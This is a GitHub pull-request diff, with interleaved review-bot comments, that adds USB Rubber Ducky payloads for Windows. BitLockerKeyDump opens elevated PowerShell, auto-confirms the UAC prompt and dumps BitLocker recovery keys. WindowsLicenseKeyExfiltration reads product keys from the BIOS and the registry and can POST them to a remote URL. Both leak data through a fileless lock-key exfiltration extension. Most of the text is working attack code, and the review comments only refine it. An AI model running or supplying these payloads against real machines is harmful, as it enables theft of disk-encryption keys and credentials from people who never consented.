Merge pull request #392 from 0iphor13/master

New Payload: BitLockerKeyDump, WindowsLicenseKeyExfiltration - New Extension: Windows_Fileless_HID_Exfil
pull/428/head
Dallas Winger 2024-01-02 19:11:36 -05:00 committed by GitHub
commit c8030600ef
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
12 changed files with 445 additions and 11 deletions

@ -1,4 +1,4 @@
EXTENSION Detect_Finished
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13

@ -1,4 +1,4 @@
EXTENSION Powershell_Download
EXTENSION POWERSHELL_DOWNLOAD
REM VERSION 1.0
REM Author: 0iphor13
REM Downloads the desired file via powershell

@ -1,4 +1,4 @@
EXTENSION Rolling_Powershell_Execution
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
REM Author: 0iphor13
REM OS: Windows

@ -1,4 +1,4 @@
EXTENSION Windows11_Console_Downgrade
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
Author: 0iphor13
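Review bot: header style is now the only thing left inconsistent across the renamed extensions: this file documents itself with a `REM_BLOCK` holding `Version: 1.0` / `Author: 0iphor13`, while the sibling extensions in this PR use single-line `REM VERSION 1.0` / `REM AUTHOR: 0iphor13` (a few use `REM Author:`). Since the PR already normalizes extension names to upper case, normalizing the header lines to the `REM VERSION` / `REM AUTHOR:` form in the same change would make the extension files grep-able by one pattern.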

@ -1,4 +1,4 @@
EXTENSION Windows_Elevated_Execution
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
REM Author: 0iphor13
REM Executes the desired program with elevated privileges

@ -0,0 +1,44 @@
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
TARGET:
Windows Hosts that supports powershell and SendKeys
USAGE:
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION
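Review bot: the bit-to-lock-key loop only encodes the low 8 bits of each character: `foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a)...}` masks a `[char]` that PowerShell widens to its 16-bit code point, so any character above U+00FF in the `Out-String` output (localized cmdlet text, box-drawing characters in table output) is silently reduced to an unrelated byte on the receiving side, with no error on either end. The DOCUMENTATION block should state the ASCII/Latin-1 limitation, or the script should replace such characters (for example with `?`) before the encoding loop so the decoded output is at least recognizably damaged. Wording in the same block: `Hak5s` -> `Hak5's`, `Windows Hosts that supports` -> `Windows hosts that support`, and `the commands/scritps output and writes it` -> `the command's or script's output and writes it`.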

@ -0,0 +1,168 @@
REM BitLockerKeyDump
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection
REM Extension made by Korben for checking if Target is Windows OS
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM
REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
TARGET:
Windows Hosts that supports powershell and SendKeys
USAGE:
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION
REM Execution of "Yes" shortcut: ALT j (german), ALT y (english)
DEFINE #YES_SHORTCUT ALT j
REM If Target is Windows, execute payload
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
REM Opening hidden powershell and pressing CAPSLOCK as Administrator
STRING powershell -nop -c "Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait('{CAPSLOCK}');powershell.exe -nop -w h"
DELAY 250
CTRL-SHIFT ENTER
REM Rather long DELAY to increase reliability
DELAY 2000
REM Shortcut for pressing yes when UAC prompt appears
#YES_SHORTCUT
REM Check for CAPSLOCK change to see if execution as Admin was successful
WAIT_FOR_CAPS_CHANGE
DELAY 1500
REM Dumping recovery keys
STRING Get-BitLockerVolume|ForEach-Object{$drive = $_.MountPoint;$Key = [string]($_.KeyProtector).RecoveryPassword;if ($Key.Length -gt 5){Write-Output ("$drive Drive - Recovery Key: $Key")}}
REM Exfiltrating keys via Keystroke Reflection
Windows_Fileless_HID_Exfil()
DELAY 150
Detect_Finished()
REM If System is not Windows...
ELSE
DELAY 500
REM ... and CAPSLOCK is ON, open Storage...
IF ($_CAPSLOCK_ON == TRUE) THEN
ATTACKMODE STORAGE
REM ... If CAPSLOCK is OFF, stay in ATTACKMODE OFF
ELSE
LED_RED
DELAY 1000
LED_OFF
ATTACKMODE OFF
END_IF
END_IF
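Review bot: `EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT` has a doubled keyword; the hunk header `@ -49,8 +49,8 @@ EXTENSION PASSIVE_WINDOWS_DETECT` from the existing payload later in this PR shows the intended single `EXTENSION`. In the inlined DETECT_FINISHED, `IF ($_CAPSLOCK_ON == FALSE)` lacks the `THEN` that every other `IF` in this file carries, and `ELSE IF` has no condition, so it should simply be `ELSE`. Both problems are copied verbatim into WindowsLicenseKeyExfiltration in this same PR, so they need fixing in both payloads (and the standalone DETECT_FINISHED extension should be checked for the same `ELSE IF`). Minor: the header comment `dumps the users BitLocker recovery key and exfiltrates them` should read `dumps the user's BitLocker recovery keys and exfiltrates them`.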

@ -0,0 +1,33 @@
**Title: BitLockerKeyDump**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is BitLockerKeyDump?**
#
<p>Lets first explain, what is "a BitLocker recovery key"?
A BitLocker recovery key is a unique 48-digit numerical password that is generated when you enable BitLocker on a Windows computer or device.
BitLocker is a disk encryption program included with Windows, and is designed to protect the data on your hard drive by encrypting it.
The recovery key is a critical component of BitLocker because it is used to unlock or recover access to the encrypted drive in case you forget your BitLocker password or experience issues with your computer's hardware or software.
Common scenarios where you might need a BitLocker recovery key:
- Forgotten Password: If you forget the password you set for BitLocker, you can use the recovery key to regain access to your encrypted drive.
- Hardware Changes: If you make significant hardware changes to your computer, such as replacing the motherboard or hard drive, BitLocker may trigger a recovery mode, and you'll need the recovery key to unlock the drive.
- Operating System Errors: In the event of certain operating system errors or issues, BitLocker may require the recovery key to restore access to the encrypted drive.
It's important to keep your BitLocker recovery key in a safe and secure location because it provides a way to bypass BitLocker's encryption and access your data.</p>
Now that we have explained what BitLocker and the recovery key are, what is BitLockerKeyDump? Short and easy: It dumps the recovery key and exfiltrates it via Keystroke Reflection.
**Instructions:**
1. Set the correct "Yes" shortcut in line 132. (i.e. `ALT j` for german systems, `ALT y` for english keyboard layouts)
2. Plug in your RubberDucky into a Windows target and wait for the process to end. Have fun observing the Keyboards LEDs ;)
_*If plugged into a non Windows system, `ATTACKMODE OFF` will be triggered, unless `CAPSLOCK` is ON while the Ducky is getting plugged in. This way you can collect the loot savely._
3. Open the exfiltrated loot.bin file to access the recovery key.
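Review bot: the README omits the precondition the payload itself depends on. The script launches PowerShell with `CTRL-SHIFT ENTER`, answers a UAC prompt with `#YES_SHORTCUT`, and then blocks on `WAIT_FOR_CAPS_CHANGE` for the CAPSLOCK press that only the elevated process sends, so it only completes when the logged-on user is a local administrator who receives a consent prompt; for a standard user UAC asks for credentials instead, the elevated CAPSLOCK never arrives, and the payload waits at `WAIT_FOR_CAPS_CHANGE`. State the administrator requirement under Instructions. Markup: the `<p>` opened at `Author:` is never closed, the bare `#` line is an empty heading, and `_*If plugged into ... savely._` has an unmatched `*`. Wording: `Lets` -> `Let's`, `savely` -> `safely`, `Keyboards LEDs` -> `keyboard's LEDs`, `non Windows` -> `non-Windows`, and `i.e.` should be `e.g.` since the two shortcuts are examples, not the full list.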

@ -37,7 +37,7 @@ EXTENSION DETECT_READY
END_EXTENSION
REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here
EXTENSION Windows_Elevated_Execution
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
REM Author: 0iphor13
REM Executes the desired program with elevated privileges
@ -72,7 +72,7 @@ EXTENSION Windows_Elevated_Execution
END_EXTENSION
REM Extension by 0iphor13, to signalize the successful execution of the payload
EXTENSION Detect_Finished
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13

@ -0,0 +1,167 @@
REM WindowsLicenseKeyExfiltration
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.
REM Extension made by Korben for checking if Target is Windows OS
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM
REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
TARGET:
Windows Hosts that supports powershell and SendKeys
USAGE:
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION
REM If set to TRUE, keys will be send via PowerShells Invoke-Restmethod
DEFINE #REMOTE_EXFIL FALSE
REM Define the remote host to which the keys shall be send to. (Only when REMOTE_EXFIL is set to TRUE!)
DEFINE #URL https://example.com/
REM If Target is Windows, execute payload
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRINGLN powershell -nop -noni
DELAY 1000
STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green
DELAY 300
REM Dumping License key when saved in Bios
STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;
REM Dumping License key via registry
STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault"
REM Executing Get_License
STRING ;IeX $Get_License
REM If REMOTE_EXFIL is set to TRUE,exfiltrate keys to remote host
IF_DEFINED_TRUE #REMOTE_EXFIL
DELAY 500
REM Setting the output as variable & sending it to defined remote host
STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit
DELAY 150
Detect_Finished()
ELSE_DEFINED
REM Exfiltrating License key via Keystroke Reflection
Windows_Fileless_HID_Exfil()
DELAY 150
Detect_Finished()
END_IF_DEFINED
REM If System is not Windows...
ELSE
ATTACKMODE STORAGE
END_IF
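Review bot: `DELAY 150` followed by `Detect_Finished()` is duplicated in both the `IF_DEFINED_TRUE #REMOTE_EXFIL` and the `ELSE_DEFINED` branch; hoisting the two lines after `END_IF_DEFINED` removes the repetition without changing behaviour. The inlined extensions carry the same defects as in BitLockerKeyDump: `EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT` has a doubled keyword, `IF ($_CAPSLOCK_ON == FALSE)` in DETECT_FINISHED lacks `THEN`, and `ELSE IF` has no condition and should be `ELSE`. Comment wording: `keys will be send via PowerShells Invoke-Restmethod` -> `keys will be sent via PowerShell's Invoke-RestMethod`, and `the remote host to which the keys shall be send to` -> `the remote host the keys are sent to`; using the documented casing `Invoke-RestMethod` in the STRING line as well would help readers searching the payload.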

@ -0,0 +1,22 @@
**Title: WindowsLicenseKeyExfiltration**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is WindowsLicenseKeyExfiltration?**
#
<p>This payload exfiltrates the Windows Product keys from the target system. These can be saved in the registry and/or on the BIOS itself. Sometimes they can differ.
This may be an important process for Admins or for your private use.</p>
**Instructions:**
1. By default, the keys will get exfiltrated via Keystroke Reflection, which may take a while but does not require any form of internet connection or mass stoarge to be allowed. If you set `REMOTE_EXFIL` in line 132 to `TRUE`, then you'll need to define the address of the receiving remote host, this either can be an URL of a webhook or an IP_Address of a system of your choice. Define it in line 134.
2. Plug in your RubberDucky into a Windows target and wait for the process to end.
_*If plugged into a non Windows system, `ATTACKMODE STORAGE` will be triggered. This way you can collect the loot savely._
3. Open the exfiltrated loot.bin file to access the recovered key, or check your remote host for received messages.
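Review bot: step 1 says the receiving host can be "an IP_Address", but `#URL` is substituted verbatim into `-Uri "#URL"` in the payload, so the instructions should say the value must be a complete URL with scheme (and path if the endpoint needs one), in the form of the default `https://example.com/`; the README should also mention that the product keys are POSTed as the plain-text request body, so only an HTTPS endpoint keeps them confidential in transit. Markup: the `<p>` opened at `Author:` is never closed, the bare `#` line is an empty heading, and `_*If plugged into ... savely._` has an unmatched `*`. Wording: `stoarge` -> `storage`, `an URL` -> `a URL`, `savely` -> `safely`, `non Windows` -> `non-Windows`, and step 3's `recovered key` should be `recovered keys`, matching the two keys (BIOS and registry) the payload dumps.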

@ -49,8 +49,8 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
REM Extension Rolling_Powershell_Execution by 0iphor13 to obfuscate the start of Powershell
EXTENSION Rolling_Powershell_Execution
REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
REM Author: 0iphor13
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
@ -129,7 +129,7 @@ EXTENSION Rolling_Powershell_Execution
REM Rolling_Powershell_Execution()
END_EXTENSION
EXTENSION Detect_Finished
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
@ -161,7 +161,7 @@ EXTENSION Detect_Finished
END_FUNCTION
END_EXTENSION
EXTENSION Windows11_Console_Downgrade
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
Author: 0iphor13